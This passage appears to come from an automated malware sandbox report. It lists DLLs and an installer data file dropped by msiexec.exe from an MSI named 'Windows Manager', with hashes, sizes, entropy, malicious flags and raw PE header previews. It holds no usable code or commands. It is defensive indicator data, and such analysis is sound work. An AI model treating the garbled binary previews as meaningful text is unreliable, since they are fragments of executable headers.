                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):935952
                                                                                                                                                                                                                                                                        Entropy (8bit):6.465848738967934
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:w327CUJc4RQ8Btk8Y5EiwB4aNXVW+hv+AhiC:cAc4RQ8BtDAoB4aNXVW+hv+AhiC
                                                                                                                                                                                                                                                                        MD5:91D4A8C2C296EF53DD8C01B9AF69B735
                                                                                                                                                                                                                                                                        SHA1:AD2E5311A0F2DBBA988FBDB6FCF70034FDA3920D
                                                                                                                                                                                                                                                                        SHA-256:A787E7A1AD12783FCBF3F853940590329E0FF0DDDF17282324F2D95ED6408F23
                                                                                                                                                                                                                                                                        SHA-512:63C5506A55DEA2B3BD1C99B79B5668F5AFC0104564E92F07AFB42F2F2B67EAE9D0E0174CB36E6095A27A6C71496206042079B6E5A2B2FF787F3CB9EF20995E9E
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:b..[...[...[..7)...[..7)..Q[..#...[..#...[..#..[..7)...[..7)...[...[...Z..d"...[..d"...[..d"...[...[...[..d"...[..Rich.[..........PE..L...!.gb.........."!................ ........................................p......,.....@.........................0|..t....|.......`...............*.......p.......,..p...................@-.......+..@............................................text...N........................... ..`.rdata..T...........................@..@.data...T............x..............@....rsrc........`.......,..............@..@.reloc.......p.......2..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
                                                                                                                                                                                                                                                                        MD5:6EA65025106536EB75F026E46643B099
                                                                                                                                                                                                                                                                        SHA1:D6F5801E370C92D8E5C2336B4022CC6CB6EC1F99
                                                                                                                                                                                                                                                                        SHA-256:DAE76CCE74D63E7935FDE4383020659D75B68632F8A01F2053EC895E69BB4EFB
                                                                                                                                                                                                                                                                        SHA-512:062AED4C7541346B7338E1D234A50AA9AF76F103A65268BA65A42508A26C10CC27CCFCE6131485403AFA36D8A8CD69F3BF1E55CD1A1F675357B87228AACBB988
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<...?...<...9.u.<...8...<...?...<...9...<...8...<...:...<...=...<...=.m.<.^.5...<.^.<...<.^....<.....<.^.>...<.Rich..<.........PE..L...Z.gb.........."!.........................................................P............@.........................P...(...x...,...............................0Z......p...............................@...............(............................text............................... ..`.rdata..............................@..@.data...t"..........................@....rsrc...............................@..@.reloc..0Z.......\..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):619024
                                                                                                                                                                                                                                                                        Entropy (8bit):6.436769279281569
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:SPN4ezd+X2P+nDxK5AW8WDExKYoWNico9pj6QZC8d9ZP9Zb:SP8VKWfKEjoW8p3jtZC8d9ZP9Zb
                                                                                                                                                                                                                                                                        MD5:0D093A6DB075DB4D3AF06337A6CFC3F3
                                                                                                                                                                                                                                                                        SHA1:7A27265809C47F96F29A09A960BADD4C83BDB167
                                                                                                                                                                                                                                                                        SHA-256:F4C42C1393B907430C89BC504B24A589438690496A38BF7B75358ADBDB48F6B3
                                                                                                                                                                                                                                                                        SHA-512:1D857EBFCF2526DD142AB72320073AE582DCF26C2D2A0D4C67267BD038182145572CA9C015F06A895555B90D8558DACFA4DF6D7A105F6072D356A71532AC87F9
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.+^Xsx^Xsx^Xsx.*pySXsx.*vy.Xsx< wyOXsx< pyFXsx.*wyGXsx< vy.Xsx.*uy_Xsx.*ryIXsx^Xrx.Ysx.!zy.Xsx.!sy_Xsx.!.x_Xsx^X.x_Xsx.!qy_XsxRich^Xsx........PE..L.....gb.........."!................l.....................................................@......................... .......<........0..h............T.......@...^......p...................@...........@.......................@....................text...&........................... ..`.rdata...!......."..................@..@.data...0"..........................@....rsrc...h....0......................@..@.reloc...^...@...`..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):198335
                                                                                                                                                                                                                                                                        Entropy (8bit):6.442325466470795
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:1j+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD5:1+FQ38t/SZfkVfISkC7R7Z1uriV
                                                                                                                                                                                                                                                                        MD5:600D10F187F90BC39DEB35D427C1C3B6
                                                                                                                                                                                                                                                                        SHA1:6E203E8FE3A5BE018B892EE996C7E959FB9BB31C
                                                                                                                                                                                                                                                                        SHA-256:7F494FCF7377C8BDF69A427F36F61F4670DED5BB37947F4CFDAEBCD3036F7C47
                                                                                                                                                                                                                                                                        SHA-512:9F54C4FA2A3E7AF283C3CF7E5B35CDB1AB4C04CB8F6C7D6F7E538A55F58314AE2C42FDB458F42E27E8CC1D246FE2CAD7279A4C907DD824D5BEDF1B23AB4AF045
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@Ct.W.@.....@.....@.....@.....@.....@......&.{C845414C-903C-4218-9DE7-132AB97FDF62}..Windows Manager$.Windows Manager - Postback Johan.msi.@.....@.....@.....@......logo.exe..&.{C5EBDD8B-C384-4CB5-9A33-9A4EF2189D51}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Manager......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........InstallInitialize......&.{FDBC5875-BBA4-4DA5-9048-A196A21FE49A}....&.{C5EBDD8B-C384-4CB5-9A33-9A4EF2189D51}c.&.{FDBC5875-BBA4-4DA5-9048-A196A21FE49A}D...logo.exeD...SystemFoldermsiexec.exe............ProcessComponents..Updating component registration...@.....@.....@.]....&.{28FDA578-EFA5-4A4F-A558-E4219B09577D}&.{C845414C-903C-4218-9DE7-132AB97FDF62}..&.{28FDA578-EFA5-4A4F-A558-E4219B09577D}...@......&.{D30ED18A-DEA4-45D6-8A1F-1643C3CC79C1}&.{C845414C-903C-4218-9DE7-132AB97FDF62}..&.{D30ED18A-DEA4-45D6-8A1F-1643C3CC79C1}...@......&.{C48C1022-6EC4-4C0F-BB98-0EA64D330920}&.{C845414C-9
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):783784
                                                                                                                                                                                                                                                                        Entropy (8bit):6.388227283064485
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:JB0aQYpzr8qjh/Kf+UA0i6mjqBUBavHqNajAJLVxAKNYFglvqrr3m/Xz/b/cEV:v0ax050IUBeqkeVJYFCqrLm/Xz/b/cEV
                                                                                                                                                                                                                                                                        MD5:07DF9CA625C2CB953B2A7F7F699CEE7C
                                                                                                                                                                                                                                                                        SHA1:3225E84B51BA76EB650231C94231B70B70B997C9
                                                                                                                                                                                                                                                                        SHA-256:265D462E9BD3FC4BDF925590A852707A52E0707407FDC4BA40A468542E8DBB77
                                                                                                                                                                                                                                                                        SHA-512:104A32900AC3F7A3815CE4670AA430677EB48BD3B8A5E17F0A05C333B8FAF776756408784C8191EA51FFD54AD52D7FCBF2611570A275EFDC6BF1B04B5706F9FD
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........p..[.y.[.y.[.y.Ozz.V.y.Oz|...y.7e}.J.y.7ez.L.y.7e|...y.Oz}.C.y.Oz..Z.y.Ozx.F.y.[.x.h.y.ep...y.ey.Z.y.e..Z.y.[...Y.y.e{.Z.y.Rich[.y.........................PE..L...].\`.........."!.........F............................................... ............@..........................M.......N....... .......................@..$...h5..p....................6.......5..@............................................text...h........................... ..`.rdata..............................@..@.data........`.......H..............@....rsrc........ ......................@..@.reloc..$....@......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
                                                                                                                                                                                                                                                                        MD5:6EA65025106536EB75F026E46643B099
                                                                                                                                                                                                                                                                        SHA1:D6F5801E370C92D8E5C2336B4022CC6CB6EC1F99
                                                                                                                                                                                                                                                                        SHA-256:DAE76CCE74D63E7935FDE4383020659D75B68632F8A01F2053EC895E69BB4EFB
                                                                                                                                                                                                                                                                        SHA-512:062AED4C7541346B7338E1D234A50AA9AF76F103A65268BA65A42508A26C10CC27CCFCE6131485403AFA36D8A8CD69F3BF1E55CD1A1F675357B87228AACBB988
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<...?...<...9.u.<...8...<...?...<...9...<...8...<...:...<...=...<...=.m.<.^.5...<.^.<...<.^....<.....<.^.>...<.Rich..<.........PE..L...Z.gb.........."!.........................................................P............@.........................P...(...x...,...............................0Z......p...............................@...............(............................text............................... ..`.rdata..............................@..@.data...t"..........................@....rsrc...............................@..@.reloc..0Z.......\..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
                                                                                                                                                                                                                                                                        MD5:6EA65025106536EB75F026E46643B099
                                                                                                                                                                                                                                                                        SHA1:D6F5801E370C92D8E5C2336B4022CC6CB6EC1F99
                                                                                                                                                                                                                                                                        SHA-256:DAE76CCE74D63E7935FDE4383020659D75B68632F8A01F2053EC895E69BB4EFB
                                                                                                                                                                                                                                                                        SHA-512:062AED4C7541346B7338E1D234A50AA9AF76F103A65268BA65A42508A26C10CC27CCFCE6131485403AFA36D8A8CD69F3BF1E55CD1A1F675357B87228AACBB988
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<...?...<...9.u.<...8...<...?...<...9...<...8...<...:...<...=...<...=.m.<.^.5...<.^.<...<.^....<.....<.^.>...<.Rich..<.........PE..L...Z.gb.........."!.........................................................P............@.........................P...(...x...,...............................0Z......p...............................@...............(............................text............................... ..`.rdata..............................@..@.data...t"..........................@....rsrc...............................@..@.reloc..0Z.......\..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
                                                                                                                                                                                                                                                                        MD5:6EA65025106536EB75F026E46643B099
                                                                                                                                                                                                                                                                        SHA1:D6F5801E370C92D8E5C2336B4022CC6CB6EC1F99
                                                                                                                                                                                                                                                                        SHA-256:DAE76CCE74D63E7935FDE4383020659D75B68632F8A01F2053EC895E69BB4EFB
                                                                                                                                                                                                                                                                        SHA-512:062AED4C7541346B7338E1D234A50AA9AF76F103A65268BA65A42508A26C10CC27CCFCE6131485403AFA36D8A8CD69F3BF1E55CD1A1F675357B87228AACBB988
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<...?...<...9.u.<...8...<...?...<...9...<...8...<...:...<...=...<...=.m.<.^.5...<.^.<...<.^....<.....<.^.>...<.Rich..<.........PE..L...Z.gb.........."!.........................................................P............@.........................P...(...x...,...............................0Z......p...............................@...............(............................text............................... ..`.rdata..............................@..@.data...t"..........................@....rsrc...............................@..@.reloc..0Z.......\..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
